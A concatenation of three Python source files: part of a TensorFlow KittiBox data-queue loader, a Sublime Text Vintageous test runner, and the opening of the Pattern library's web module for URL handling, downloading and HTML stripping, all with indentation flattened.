mask_in = tf.placeholder(tf.float32)
calib_in = tf.placeholder(tf.float32)
calib_pinv_in = tf.placeholder(tf.float32)
xy_scale_in = tf.placeholder(tf.float32)
# Creating Enqueue OP
# 入列元素
enqueue_op = q.enqueue((x_in, confs_in, boxes_in, mask_in, calib_in, calib_pinv_in, xy_scale_in))
def make_feed(data):
return {x_in: data['image'],
confs_in: data['confs'],
boxes_in: data['boxes'],
mask_in: data['mask'],
calib_in: data['calib'],
calib_pinv_in: data['calib_pinv'],
xy_scale_in: data['xy_scale']}
def thread_loop(sess, enqueue_op, gen):
# 参数 feed_dict给使用placeholder创建出来的tensor赋值, 也允许调用者替换图中张量的值
# 通过迭代来给队列喂数据
for d in gen:
sess.run(enqueue_op, feed_dict=make_feed(d))
data_file = hypes["data"]['%s_file' % phase] # train_file
data_dir = hypes['dirs']['data_dir']
data_file = os.path.join(data_dir, data_file) # ../data/KittiBox/train.txt
# 返回的是生成器
gen = _load_kitti_txt(data_file, hypes, jitter={'train': hypes['solver']['use_jitter'], 'val': False}[phase])
# 第一次调用gen用next(),yield的数据返回给data
data = next(gen)
sess.run(enqueue_op, feed_dict=make_feed(data))
# 多线程
# 这个子线程用来装载数据
t = threading.Thread(target=thread_loop, args=(sess, enqueue_op, gen))
# daemon守护线程,只有这个线程时,线程结束
t.daemon = True
# 线程启动
t.start()
def inputs(hypes, q, phase):
if phase == 'val':
image, confidences, boxes, mask, calib, calib_pinv, xy_scale = q.dequeue()
image = tf.expand_dims(image, 0)
confidences = tf.expand_dims(confidences, 0)
boxes = tf.expand_dims(boxes, 0)
mask = tf.expand_dims(mask, 0)
calib = tf.expand_dims(calib, 0)
calib_pinv = tf.expand_dims(calib_pinv, 0)
xy_scale = tf.expand_dims(xy_scale, 0)
return image, (confidences, boxes, mask, calib, calib_pinv, xy_scale)
elif phase == 'train':
# dequeue_many(n)将n个元素连接到一起移出队列
# image=Tensor(shape=(8,384,1248,3))
# confidences=Tensor(shape=(8,12,39))
# boxes=Tensor(shape=(8,12,39,11))
# mask=Tensor(shape=(8,12,39))
# calib=Tensor(shape=(8,12,39,3,4))
# calib_pinv=Tensor(shape=(8,12,39,4,3))
# xy_scale=Tensor(shape=(8,12,39,2))
image, confidences, boxes, mask, calib, calib_pinv, xy_scale = q.dequeue_many(hypes['batch_size'])
image = _processe_image(hypes, image)
return image, (confidences, boxes, mask, calib, calib_pinv, xy_scale)
else:
assert("Bad phase: {}".format(phase))
# test the gen
if __name__ == '__main__':
with open("../hypes/kittiBox.json", 'r') as f:
logging.info("f: %s", f)
hype = json.load(f)
data_file1 = hype["data"]['%s_file' % 'train'] # train_file
data_dir1 = hype['dirs']['data_dir']
data_file1 = os.path.join(data_dir1, data_file1)
gen1 = _load_kitti_txt(data_file1, hype, jitter=False)
data1 = next(gen1)
|
test_runner.py
|
from threading import Thread
import contextlib
import os
import unittest
import sublime
import sublime_plugin
class __vi_tests_write_buffer(sublime_plugin.TextCommand):
"""Replaces the buffer's content with the specified `text`.
`text`: Text to be written to the buffer.
"""
def run(self, edit, text=''):
self.view.replace(edit, sublime.Region(0, self.view.size()), text)
class __vi_tests_erase_all(sublime_plugin.TextCommand):
"""Replaces the buffer's content with the specified `text`.
"""
def run(self, edit):
self.view.erase(edit, sublime.Region(0, self.view.size()))
class OutputPanel(object):
def __init__(self, name,
file_regex='',
line_regex='',
base_dir=None,
word_wrap=False,
line_numbers=False,
gutter=False,
scroll_past_end=False,
syntax='',
):
self.name = name
self.window = sublime.active_window()
if not hasattr(self, 'output_view'):
# Try not to call get_output_panel until the regexes are assigned
self.output_view = self.window.create_output_panel(self.name)
# Default to the current file directory
if (not base_dir and self.window.active_view() and
self.window.active_view().file_name()):
base_dir = os.path.dirname(
self.window.active_view().file_name()
)
self.output_view.settings().set('result_file_regex', file_regex)
self.output_view.settings().set('result_line_regex', line_regex)
self.output_view.settings().set('result_base_dir', base_dir)
self.output_view.settings().set('word_wrap', word_wrap)
self.output_view.settings().set('line_numbers', line_numbers)
self.output_view.settings().set('gutter', gutter)
self.output_view.settings().set('scroll_past_end', scroll_past_end)
self.output_view.settings().set('syntax', syntax)
# Call create_output_panel a second time after assigning the above
# settings, so that it'll be picked up as a result buffer
self.window.create_output_panel(self.name)
def write(self, s):
f = lambda: self.output_view.run_command('append', {'characters': s})
sublime.set_timeout(f, 0)
def flush(self):
pass
def show(self):
self.window.run_command(
'show_panel', {'panel': 'output.' + self.name}
)
def close(self):
pass
class RunVintageousTests(sublime_plugin.WindowCommand):
'''
Runs tests and displays the results.
- Do not use Sublime Text while tests are running.
@working_dir
Required. Should be the parent of the top-level directory for `tests`.
@loader_pattern
Optional. Only run tests matching this glob.
@tests_dir
Name of the directory containing tests.
@active_file_only
Optional. Only run tests in the active file in ST. Shadows
@loader_pattern.
To use this runner conveniently, open the command palette and select one
of the `Build: Vintageous - Test *` commands.
'''
def run(self, working_dir,
loader_pattern="test*.py",
tests_dir="tests",
**kwargs):
assert os.path.exists(working_dir), 'working_dir must exist'
with self.chdir(working_dir):
p = os.path.join(os.getcwd(), tests_dir)
patt = loader_pattern
# TODO(guillermooo): I can't get $file to expand in the build
# system. It should be possible to make the following code simpler
# with it.
if kwargs.get('active_file_only') is True:
patt = os.path.basename(self.window.active_view().file_name())
# run text-based tests
if patt.endswith(('.cmd-test', '.cmd-test-solo')):
patt = 'test_all_cmds.py'
suite = unittest.TestLoader().discover(p, pattern=patt)
file_regex = r'^\s*File\s*"([^.].*?)",\s*line\s*(\d+),.*$'
display = OutputPanel('vintageous.tests',
file_regex=file_regex,
word_wrap=True
)
display.show()
runner = unittest.TextTestRunner(stream=display, verbosity=1)
def run_and_display():
runner.run(suite)
# XXX: If we don't do this, custom mappings won't be available
# after running the test suite.
self.window.run_command('reset_vintageous')
Thread(target=run_and_display).start()
@contextlib.contextmanager
def chdir(self, path=None):
old_path = os.getcwd()
if path:
assert os.path.exists(path), "'path' is invalid {}".format(path)
os.chdir(path)
yield
if path is not None:
os.chdir(old_path)
|
__init__.py
|
#### PATTERN | WEB #################################################################################
# Copyright (c) 2010 University of Antwerp, Belgium
# Author: Tom De Smedt <tom@organisms.be>
# License: BSD (see LICENSE.txt for details).
# http://www.clips.ua.ac.be/pages/pattern
####################################################################################################
# Python API interface for various web services (Google, Twitter, Wikipedia, ...)
# smgllib.py is removed from Python 3, a warning is issued in Python 2.6+. Ignore for now.
import warnings; warnings.filterwarnings(action='ignore', category=DeprecationWarning, module="sgmllib")
import threading
import time
import os
import socket, urlparse, urllib, urllib2
import base64
import htmlentitydefs
import sgmllib
import re
import xml.dom.minidom
import StringIO
import bisect
import new
import api
import feed
import oauth
import json
import locale
from feed import feedparser
from soup import BeautifulSoup
try:
# Import persistent Cache.
# If this module is used separately, a dict is used (i.e. for this Python session only).
from cache import Cache, cache, TMP
except:
cache = {}
try:
from imap import Mail, MailFolder, Message, GMAIL
from imap import MailError, MailServiceError, MailLoginError, MailNotLoggedIn
from imap import FROM, SUBJECT, DATE, BODY, ATTACHMENTS
except:
pass
try:
MODULE = os.path.dirname(os.path.abspath(__file__))
except:
MODULE = ""
#### UNICODE #######################################################################################
def decode_utf8(string):
""" Returns the given string as a unicode string (if possible).
"""
if isinstance(string, str):
for encoding in (("utf-8",), ("windows-1252",), ("utf-8", "ignore")):
try:
return string.decode(*encoding)
except:
pass
return string
return unicode(string)
def encode_utf8(string):
""" Returns the given string as a Python byte string (if possible).
"""
if isinstance(string, unicode):
try:
return string.encode("utf-8")
except:
return string
return str(string)
u = decode_utf8
s = encode_utf8
# For clearer source code:
bytestring = s
#### ASYNCHRONOUS REQUEST ##########################################################################
class AsynchronousRequest:
def __init__(self, function, *args, **kwargs):
""" Executes the function in the background.
AsynchronousRequest.done is False as long as it is busy, but the program will not halt in the meantime.
AsynchronousRequest.value contains the function's return value once done.
AsynchronousRequest.error contains the Exception raised by an erronous function.
For example, this is useful for running live web requests while keeping an animation running.
For good reasons, there is no way to interrupt a background process (i.e. Python thread).
You are responsible for ensuring that the given function doesn't hang.
"""
self._response = None # The return value of the given function.
self._error = None # The exception (if any) raised by the function.
self._time = time.time()
self._function = function
self._thread = threading.Thread(target=self._fetch, args=(function,)+args, kwargs=kwargs)
self._thread.start()
def _fetch(self, function, *args, **kwargs):
""" Executes the function and sets AsynchronousRequest.response.
"""
try:
self._response = function(*args, **kwargs)
except Exception, e:
self._error = e
def now(self):
""" Waits for the function to finish and yields its return value.
"""
self._thread.join(); return self._response
@property
def elapsed(self):
return time.time() - self._time
@property
def done(self):
return not self._thread.isAlive()
@property
def value(self):
return self._response
@property
def error(self):
return self._error
def __repr__(self):
return "AsynchronousRequest(function='%s')" % self._function.__name__
def asynchronous(function, *args, **kwargs):
""" Returns an AsynchronousRequest object for the given function.
"""
return AsynchronousRequest(function, *args, **kwargs)
send = asynchronous
#### URL ###########################################################################################
# User agent and referrer.
# Used to identify the application accessing the web.
USER_AGENT = "Pattern/2.3 +http://www.clips.ua.ac.be/pages/pattern"
REFERRER = "http://www.clips.ua.ac.be/pages/pattern"
# Mozilla user agent.
# Websites can include code to block out any application except browsers.
MOZILLA = "Mozilla/5.0"
# HTTP request method.
GET = "get" # Data is encoded in the URL.
POST = "post" # Data is encoded in the message body.
# URL parts.
# protocol://username:password@domain:port/path/page?query_string#anchor
PROTOCOL, USERNAME, PASSWORD, DOMAIN, PORT, PATH, PAGE, QUERY, ANCHOR = \
"protocol", "username", "password", "domain", "port", "path", "page", "query", "anchor"
# MIME type.
MIMETYPE_WEBPAGE = ["text/html"]
MIMETYPE_STYLESHEET = ["text/css"]
MIMETYPE_PLAINTEXT = ["text/plain"]
MIMETYPE_PDF = ["application/pdf"]
MIMETYPE_NEWSFEED = ["application/rss+xml", "application/atom+xml"]
MIMETYPE_IMAGE = ["image/gif", "image/jpeg", "image/png", "image/tiff"]
MIMETYPE_AUDIO = ["audio/mpeg", "audio/mp4", "audio/x-aiff", "audio/x-wav"]
MIMETYPE_VIDEO = ["video/mpeg", "video/mp4", "video/quicktime"]
MIMETYPE_ARCHIVE = ["application/x-stuffit", "application/x-tar", "application/zip"]
MIMETYPE_SCRIPT = ["application/javascript", "application/ecmascript"]
def extension(filename):
""" Returns the extension in the given filename: "cat.jpg" => ".jpg".
"""
return os.path.splitext(filename)[1]
def urldecode(query):
""" Inverse operation of urllib.urlencode.
Returns a dictionary of (name, value)-items from a URL query string.
"""
def _format(s):
if s == "None":
return None
if s.isdigit():
return int(s)
try: return float(s)
except:
return s
query = [(kv.split("=")+[None])[:2] for kv in query.lstrip("?").split("&")]
query = [(urllib.unquote_plus(bytestring(k)), urllib.unquote_plus(bytestring(v))) for k, v in query]
query = [(u(k), u(v)) for k, v in query]
query = [(k, _format(v) or None) for k, v in query]
query = dict([(k,v) for k, v in query if k != ""])
return query
url_decode = urldecode
def proxy(host, protocol="https"):
""" Returns the value for the URL.open() proxy parameter.
- host: host address of the proxy server.
"""
return (host, protocol)
class URLError(Exception):
pass # URL contains errors (e.g. a missing t in htp://).
class URLTimeout(URLError):
pass # URL takes to long to load.
class HTTPError(URLError):
pass # URL causes an error on the contacted server.
class HTTP301Redirect(HTTPError):
pass # Too many redirects.
# The site may be trying to set a cookie and waiting for you to return it,
# or taking other measures to discern a browser from a script.
# For specific purposes you should build your own urllib2.HTTPRedirectHandler
# and pass it to urllib2.build_opener() in URL.open()
class HTTP400BadRequest(HTTPError):
pass # URL contains an invalid request.
class HTTP401Authentication(HTTPError):
pass # URL requires a login and password.
class HTTP403Forbidden(HTTPError):
pass # URL is not accessible (user-agent?)
class HTTP404NotFound(HTTPError):
pass # URL doesn't exist on the internet.
class HTTP420Error(HTTPError):
pass # Used by Twitter for rate limiting.
class HTTP500InternalServerError(HTTPError):
pass # Generic server error.
class URL:
def __init__(self, string=u"", method=GET, query={}):
""" URL object with the individual parts available as attributes:
For protocol://username:password@domain:port/path/page?query_string#anchor:
- URL.protocol: http, https, ftp, ...
- URL.username: username for restricted domains.
- URL.password: password for restricted domains.
- URL.domain : the domain name, e.g. nodebox.net.
- URL.port : the server port to connect to.
- URL.path : the server path of folders, as a list, e.g. ['news', '2010']
- URL.page : the page name, e.g. page.html.
- URL.query : the query string as a dictionary of (name, value)-items.
- URL.anchor : the page anchor.
If method is POST, the query string is sent with HTTP POST.
"""
self.__dict__["method"] = method # Use __dict__ directly since __setattr__ is overridden.
self.__dict__["_string"] = u(string)
self.__dict__["_parts"] = None
self.__dict__["_headers"] = None
self.__dict__["_redirect"] = None
if isinstance(string, URL):
self.__dict__["method"] = string.method
self.query.update(string.query)
if len(query) > 0:
# Requires that we parse the string first (see URL.__setattr__).
self.query.update(query)
def _parse(self):
""" Parses all the parts of the URL string to a dictionary.
URL format: protocal://username:password@domain:port/path/page?querystring#anchor
For example: http://user:pass@example.com:992/animal/bird?species=seagull&q#wings
This is a cached method that is only invoked when necessary, and only once.
"""
p = urlparse.urlsplit(self._string)
P = {PROTOCOL: p[0], # http
USERNAME: u"", # user
PASSWORD: u"", # pass
DOMAIN: p[1], # example.com
PORT: u"", # 992
PATH: p[2], # [animal]
PAGE: u"", # bird
QUERY: urldecode(p[3]), # {"species": "seagull", "q": None}
ANCHOR: p[4] # wings
}
# Split the username and password from the domain.
if "@" in P[DOMAIN]:
P[USERNAME], \
P[PASSWORD] = (p[1].split("@")[0].split(":")+[u""])[:2]
P[DOMAIN] = p[1].split("@")[1]
# Split the port number from the domain.
if ":" in P[DOMAIN]:
P[DOMAIN], \
P[PORT] = P[DOMAIN].split(":")
P[PORT] = int(P[PORT])
# Split the base page from the path.
if "/" in P[PATH]:
P[PAGE] = p[2].split("/")[-1]
P[PATH] = p[2][:len(p[2])-len(P[PAGE])].strip("/").split("/")
P[PATH] = filter(lambda v: v != "", P[PATH])
else:
P[PAGE] = p[2].strip("/")
P[PATH] = []
self.__dict__["_parts"] = P
# URL.string yields unicode(URL) by joining the different parts,
# if the URL parts have been modified.
def _get_string(self): return unicode(self)
def _set_string(self, v):
self.__dict__["_string"] = u(v)
self.__dict__["_parts"] = None
string = property(_get_string, _set_string)
@property
def parts(self):
""" Yields a dictionary with the URL parts.
"""
if not self._parts: self._parse()
return self._parts
@property
def querystring(self):
""" Yields the URL querystring: "www.example.com?page=1" => "page=1"
"""
s = self.parts[QUERY].items()
s = dict((bytestring(k), bytestring(v if v is not None else "")) for k, v in s)
s = urllib.urlencode(s)
return s
def __getattr__(self, k):
if k in self.__dict__ : return self.__dict__[k]
if k in self.parts : return self.__dict__["_parts"][k]
raise AttributeError, "'URL' object has no attribute '%s'" % k
def __setattr__(self, k, v):
if k in self.__dict__ : self.__dict__[k] = u(v); return
if k == "string" : self._set_string(v); return
if k == "query" : self.parts[k] = v; return
if k in self.parts : self.__dict__["_parts"][k] = u(v); return
raise AttributeError, "'URL' object has no attribute '%s'" % k
def open(self, timeout=10, proxy=None, user_agent=USER_AGENT, referrer=REFERRER, authentication=None):
""" Returns a connection to the url from which data can be retrieved with connection.read().
When the timeout amount of seconds is exceeded, raises a URLTimeout.
When an error occurs, raises a URLError (e.g. HTTP404NotFound).
"""
url = self.string
# Use basic urllib.urlopen() instead of urllib2.urlopen() for local files.
if os.path.exists(url):
return urllib.urlopen(url)
# Get the query string as a separate parameter if method=POST.
post = self.method == POST and self.querystring or None
socket.setdefaulttimeout(timeout)
if proxy:
proxy = urllib2.ProxyHandler({proxy[1]: proxy[0]})
proxy = urllib2.build_opener(proxy, urllib2.HTTPHandler)
urllib2.install_opener(proxy)
try:
request = urllib2.Request(bytestring(url), post, {
"User-Agent": user_agent,
"Referer": referrer
})
# Basic authentication is established with authentication=(username, password).
if authentication is not None:
request.add_header("Authorization", "Basic %s" %
base64.encodestring('%s:%s' % authentication))
return urllib2.urlopen(request)
except urllib2.HTTPError, e:
if e.code == 301: raise HTTP301Redirect
if e.code == 400: raise HTTP400BadRequest
if e.code == 401: raise HTTP401Authentication
if e.code == 403: raise HTTP403Forbidden
if e.code == 404: raise HTTP404NotFound
if e.code == 420: raise HTTP420Error
if e.code == 500: raise HTTP500InternalServerError
raise HTTPError
except socket.timeout:
raise URLTimeout
except urllib2.URLError, e:
if e.reason == "timed out" \
or e.reason[0] in (36, "timed out"):
raise URLTimeout
raise URLError, e.reason
except ValueError, e:
raise URLError, e
def download(self, timeout=10, cached=True, throttle=0, proxy=None, user_agent=USER_AGENT, referrer=REFERRER, authentication=None, unicode=False, **kwargs):
""" Downloads the content at the given URL (by default it will be cached locally).
Unless unicode=False, the content is returned as a unicode string.
"""
# Filter OAuth parameters from cache id (they will be unique for each request).
if self._parts is None and self.method == GET and "oauth_" not in self._string:
id = self._string
else:
id = repr(self.parts)
id = re.sub("u{0,1}'oauth_.*?': u{0,1}'.*?', ", "", id)
# Keep a separate cache of unicode and raw download for same URL.
if unicode is True:
id = "u" + id
if cached and id in cache:
if isinstance(cache, dict): # Not a Cache object.
return cache[id]
if unicode is True:
return cache[id]
if unicode is False:
return cache.get(id, unicode=False)
t = time.time()
# Open a connection with the given settings, read it and (by default) cache the data.
data = self.open(timeout, proxy, user_agent, referrer, authentication).read()
if unicode is True:
data = u(data)
if cached:
cache[id] = data
if throttle:
time.sleep(max(throttle-(time.time()-t), 0))
return data
def read(self, *args):
return self.open().read(*args)
@property
def exists(self, timeout=10):
""" Yields False if the URL generates a HTTP404NotFound error.
"""
try: self.open(timeout)
except HTTP404NotFound:
return False
except HTTPError, URLTimeoutError:
return True
except URLError:
return False
except:
return True
return True
@property
def mimetype(self, timeout=10):
""" Yields the MIME-type of the document at the URL, or None.
MIME is more reliable than simply checking the document extension.
You can then do: URL.mimetype in MIMETYPE_IMAGE.
"""
try:
return self.headers["content-type"].split(";")[0]
except KeyError:
return None
@property
def headers(self, timeout=10):
""" Yields a dictionary with the HTTP response headers.
"""
if self.__dict__["_headers"] is None:
try:
h = dict(self.open(timeout).info())
except URLError:
h = {}
self.__dict__["_headers"] = h
return self.__dict__["_headers"]
@property
def redirect(self, timeout=10):
""" Yields the redirected URL, or None.
"""
if self.__dict__["_redirect"] is None:
try:
r = self.open(timeout).geturl()
except URLError:
r = None
self.__dict__["_redirect"] = r != self.string and r or ""
return self.__dict__["_redirect"] or None
def __str__(self):
return bytestring(self.string)
def __unicode__(self):
# The string representation includes the query attributes with HTTP GET.
# This gives us the advantage of not having to parse the URL
# when no separate query attributes were given (e.g. all info is in URL._string):
if self._parts is None and self.method == GET:
return self._string
P = self._parts
u = []
if P[PROTOCOL]:
u.append("%s://" % P[PROTOCOL])
if P[USERNAME]:
u.append("%s:%s@" % (P[USERNAME], P[PASSWORD]))
if P[DOMAIN]:
u.append(P[DOMAIN])
if P[PORT]:
u.append(":%s" % P[PORT])
if P[PATH]:
u.append("/%s/" % "/".join(P[PATH]))
if P[PAGE] and len(u) > 0:
u[-1] = u[-1].rstrip("/")
if P[PAGE]:
u.append("/%s" % P[PAGE])
if P[QUERY] and self.method == GET:
u.append("?%s" % self.querystring)
if P[ANCHOR]:
u.append("#%s" % P[ANCHOR])
u = u"".join(u)
u = u.lstrip("/")
return u
def __repr__(self):
return "URL('%s', method='%s')" % (str(self), str(self.method))
def copy(self):
return URL(self.string, self.method, self.query)
def download(url=u"", method=GET, query={}, timeout=10, cached=True, throttle=0, proxy=None, user_agent=USER_AGENT, referrer=REFERRER, authentication=None, unicode=False):
""" Downloads the content at the given URL (by default it will be cached locally).
Unless unicode=False, the content is returned as a unicode string.
"""
return URL(url, method, query).download(timeout, cached, throttle, proxy, user_agent, referrer, authentication, unicode)
#url = URL("http://user:pass@example.com:992/animal/bird?species#wings")
#print url.parts
#print url.query
#print url.string
#--- STREAMING URL BUFFER --------------------------------------------------------------------------
def bind(object, method, function):
""" Attaches the function as a method with the given name to the given object.
"""
setattr(object, method, new.instancemethod(function, object))
class Stream(list):
def __init__(self, url, delimiter="\n", **kwargs):
""" Buffered stream of data from a given URL.
"""
self.socket = URL(url).open(**kwargs)
self.buffer = ""
self.delimiter = delimiter
def update(self, bytes=1024):
""" Reads a number of bytes from the stream.
If a delimiter is encountered, calls Stream.parse() on the packet.
"""
packets = []
self.buffer += self.socket.read(bytes)
self.buffer = self.buffer.split(self.delimiter, 1)
while len(self.buffer) > 1:
data = self.buffer[0]
data = self.parse(data)
packets.append(data)
self.buffer = self.buffer[-1]
self.buffer = self.buffer.split(self.delimiter, 1)
self.buffer = self.buffer[-1]
self.extend(packets)
return packets
def parse(self, data):
""" Must be overridden in a subclass.
"""
return data
def clear(self):
list.__init__(self, [])
def stream(url, delimiter="\n", parse=lambda data: data, **kwargs):
""" Returns a new Stream with the given parse method.
"""
stream = Stream(url, delimiter, **kwargs)
bind(stream, "parse", lambda stream, data: parse(data))
return stream
#--- FIND URLs -------------------------------------------------------------------------------------
RE_URL_PUNCTUATION = ("\"'{(>", "\"'.,;)}")
RE_URL_HEAD = r"[%s|\[|\s]" % "|".join(RE_URL_PUNCTUATION[0]) # Preceded by space, parenthesis or HTML tag.
RE_URL_TAIL = r"[%s|\]]*[\s|\<]" % "|".join(RE_URL_PUNCTUATION[1]) # Followed by space, punctuation or HTML tag.
RE_URL1 = r"(https?://.*?)" + RE_URL_TAIL # Starts with http:// or https://
RE_URL2 = RE_URL_HEAD + r"(www\..*?\..*?)" + RE_URL_TAIL # Starts with www.
RE_URL3 = RE_URL_HEAD + r"([\w|-]*?\.(com|net|org))" + RE_URL_TAIL # Ends with .com, .net, .org
RE_URL1, RE_URL2, RE_URL3 = (
re.compile(RE_URL1, re.I),
re.compile(RE_URL2, re.I),
re.compile(RE_URL3, re.I))
def find_urls(string, unique=True):
""" Returns a list of URLs parsed from the string.
Works on http://, https://, www. links or domain names ending in .com, .org, .net.
Links can be preceded by leading punctuation (open parens)
and followed by trailing punctuation (period, comma, close parens).
"""
string = u(string)
string = string.replace(u"\u2024", ".")
string = string.replace(" ", " ")
matches = []
for p in (RE_URL1, RE_URL2, RE_URL3):
for m in p.finditer(" %s " % string):
s = m.group(1)
s = s.split("\">")[0].split("'>")[0] # google.com">Google => google.com
if not unique or s not in matches:
matches.append(s)
return matches
links = find_urls
RE_EMAIL = re.compile(r"[\w\-\.\+]+@(\w[\w\-]+\.)+[\w\-]+") # tom.de+smedt@clips.ua.ac.be
def find_email(string, unique=True):
""" Returns a list of e-mail addresses parsed from the string.
"""
string = u(string).replace(u"\u2024", ".")
matches = []
for m in RE_EMAIL.finditer(string):
s = m.group(0)
if not unique or s not in matches:
matches.append(s)
return matches
def find_between(a, b, string):
""" Returns a list of substrings between a and b in the given string.
"""
p = "%s(.*?)%s" % (a, b)
p = re.compile(p, re.DOTALL | re.I)
return [m for m in p.findall(string)]
#### PLAIN TEXT ####################################################################################
BLOCK = [
"title", "h1", "h2", "h3", "h4", "h5", "h6", "p",
"center", "blockquote", "div", "table", "ul", "ol", "pre", "code", "form"
]
SELF_CLOSING = ["br", "hr", "img"]
# Element tag replacements for a stripped version of HTML source with strip_tags().
# Block-level elements are followed by linebreaks,
# list items are preceded by an asterisk ("*").
LIST_ITEM = "*"
blocks = dict.fromkeys(BLOCK+["br", "tr", "td"], ("", "\n\n"))
blocks.update({
"li": ("%s " % LIST_ITEM, "\n"),
"img": ("", ""),
"br": ("", "\n"),
"th": ("", "\n"),
"tr": ("", "\n"),
"td": ("", "\t"),
})
class HTMLParser(sgmllib.SGMLParser):
def __init__(self):
sgmllib.SGMLParser.__init__(self)
def handle_starttag(self, tag, attrs):
pass
def handle_endtag(self, tag):
pass
def unknown_starttag(self, tag, attrs):
self.handle_starttag(tag, attrs)
def unknown_endtag(self, tag):
self.handle_endtag(tag)
def clean(self, html):
html = decode_utf8(html)
html = html.replace("/>", " />")
html = html.replace(" />", " />")
html = html.replace("<!", "<!")
html = html.replace("<!DOCTYPE", "<!DOCTYPE")
html = html.replace("<!doctype", "<!doctype")
html = html.replace("<!--", "<!--")
return html
def parse_declaration(self, i):
# We can live without sgmllib's parse_declaration().
try:
return sgmllib.SGMLParser.parse_declaration(self, i)
except sgmllib.SGMLParseError:
return i + 1
def convert_charref(self, name):
# This fixes a bug in older versions of sgmllib when working with Unicode.
# Fix: ASCII ends at 127, not 255
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 127:
return
return chr(n)
class HTMLTagstripper(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
def strip(self, html, exclude=[], replace=blocks):
""" Returns the HTML string with all element tags (e.g. <p>) removed.
- exclude : a list of tags to keep. Element attributes are stripped.
To preserve attributes a dict of (tag name, [attribute])-items can be given.
- replace : a dictionary of (tag name, (replace_before, replace_after))-items.
By default, block-level elements are separated with linebreaks.
"""
if html is None:
return None
self._exclude = isinstance(exclude, dict) and exclude or dict.fromkeys(exclude, [])
self._replace = replace
self._data = []
self.feed(self.clean(html))
self.close()
self.reset()
return "".join(self._data)
def clean(self, html):
# Escape all entities (just strip tags).
return HTMLParser.clean(self, html).replace("&", "&")
def handle_starttag(self, tag, attributes):
if tag in self._exclude:
# Create the tag attribute string,
# including attributes defined in the HTMLTagStripper._exclude dict.
a = len(self._exclude[tag]) > 0 and attributes or []
a = ["%s=\"%s\"" % (k,v) for k, v in a if k in self._exclude[tag]]
a = (" "+" ".join(a)).rstrip()
self._data.append("<%s%s>" % (tag, a))
if tag in self._replace:
self._data.append(self._replace[tag][0])
if tag in self._replace and tag in SELF_CLOSING:
self._data.append(self._replace[tag][1])
def handle_endtag(self, tag):
if tag in self._exclude and self._data and self._data[-1].startswith("<"+tag):
# Never keep empty elements (e.g. <a></a>).
self._data.pop(-1); return
if tag in self._exclude:
self._data.append("</%s>" % tag)
if tag in self._replace:
self._data.append(self._replace[tag][1])
def handle_data(self, data):
self._data.append(data.strip("\n\t"))
def handle_comment(self, comment):
if "comment" in self._exclude or \
"!--" in self._exclude:
self._data.append("<!--%s-->" % comment)
# As a function:
strip_tags = HTMLTagstripper().strip
def strip_element(string, tag, attributes=""):
""" Removes all elements with the given tagname and attributes from the string.
Open and close tags are kept in balance.
No HTML parser is used: strip_element(s, "a", "href='foo' class='bar'")
matches "<a href='foo' class='bar'" but not "<a class='bar' href='foo'".
"""
s = string.lower() # Case-insensitive.
t = tag.strip("</>")
a = (" " + attributes.lower().strip()).rstrip()
i = 0
j = 0
while j >= 0:
i = s.find("<%s%s" % (t, a), i)
j = s.find("</%s>" % t, i+1)
opened, closed = s[i:j].count("<%s" % t), 1
while opened > closed and j >= 0:
k = s.find("</%s>" % t, j+1)
opened += s[j:k].count("<%s" % t)
closed += 1
j = k
if i < 0: return string
if j < 0: return string[:i]
string = string[:i] + string[j+len(t)+3:]; s=string.lower()
return string
def strip_between(a, b, string):
""" Removes anything between (and including) string a and b inside the given string.
"""
p = "%s.*?%s" % (a, b)
p = re.compile(p, re.DOTALL | re.I)
return re.sub(p, "", string)
def strip_javascript(html):
return strip_between("<script.*?>", "</script>", html)
def strip_inline_css(html):
return strip_between("<style.*?>", "</style>", html)
def strip_comments(html):
return strip_between("<!--", "-->", html)
def strip_forms(html):
return strip_between("<form.*?>", "</form>", html)
RE_AMPERSAND = re.compile("\&(?!\#)") # & not followed by #
RE_UNICODE = re.compile(r'&(#?)(x|X?)(\w+);') # É
def encode_entities(string):
""" Encodes HTML entities in the given string ("<" => "<").
For example, to display "<em>hello</em>" in a browser,
we need to pass "<em>hello</em>" (otherwise "hello" in italic is displayed).
"""
if isinstance(string, (str, unicode)):
string = RE_AMPERSAND.sub("&", string)
string = string.replace("<", "<")
string = string.replace(">", ">")
string = string.replace('"', """)
string = string.replace("'", "'")
return string
def decode_entities(string):
""" Decodes HTML entities in the given string ("<" => "<").
"""
# http://snippets.dzone.com/posts/show/4569
def replace_entity(match):
hash, hex, name = match.group(1), match.group(2), match.group(3)
if hash == "#" or name.isdigit():
if hex == '' :
return unichr(int(name)) # "&" => "&"
if hex in ("x","X"):
return unichr(int('0x'+name, 16)) # "&" = > "&"
else:
cp = htmlentitydefs.name2codepoint.get(name) # "&" => "&"
return cp and unichr(cp) or match.group() # "&foo;" => "&foo;"
if isinstance(string, (str, unicode)):
return RE_UNICODE.subn(replace_entity, string)[0]
return string
def encode_url(string):
return urllib.quote_plus(bytestring(string))
def decode_url(string):
return urllib.unquote_plus(string) # "black/white" => "black%2Fwhite".
RE_SPACES = re.compile("( |\xa0)+", re.M) # Matches one or more spaces.
RE_TABS = re.compile(r"\t+", re.M) # Matches one or more tabs.
def collapse_spaces(string, indentation=False, replace=" "):
""" Returns a string with consecutive spaces collapsed to a single space.
Whitespace on empty lines and at the end of each line is removed.
With indentation=True, retains leading whitespace on each line.
"""
p = []
for x in string.splitlines():
n = indentation and len(x) - len(x.lstrip()) or 0
p.append(x[:n] + RE_SPACES.sub(replace, x[n:]).strip())
return "\n".join(p)
def collapse_tabs(string, indentation=False, replace=" "):
""" Returns a string with (consecutive) tabs replaced by a single space.
Whitespace on empty lines and at the end of each line is removed.
With indentation=True, retains leading whitespace on each line.
"""
p = []
for x in string.splitlines():
n = indentation and len(x) - len(x.lstrip()) or 0
p.append(x[:n] + RE_TABS.sub(replace, x[n:]).strip())
return "\n".join(p)
def collapse_linebreaks(string, threshold=1):
""" Returns a string with consecutive linebreaks collapsed to at most the given threshold.
Whitespace on empty lines and at the end of each line is removed.
"""
n = "\n" * threshold
p = [s.rstrip() for s in string.splitlines()]
string = "\n".join(p)
string = re.sub(n+r"+", n, string)
return string
def plaintext(html, keep=[], replace=blocks, linebreaks=2, indentation=False):
""" Returns a string with all HTML tags removed.
Content inside HTML comments, the <style> tag and the <script> tags is removed.
- keep : a list of tags to keep. Element attributes are stripped.
To preserve attributes a dict of (tag name, [attribute])-items can be given.
- replace : a dictionary of (tag name, (replace_before, replace_after))-items.
By default, block-level elements are followed by linebreaks.
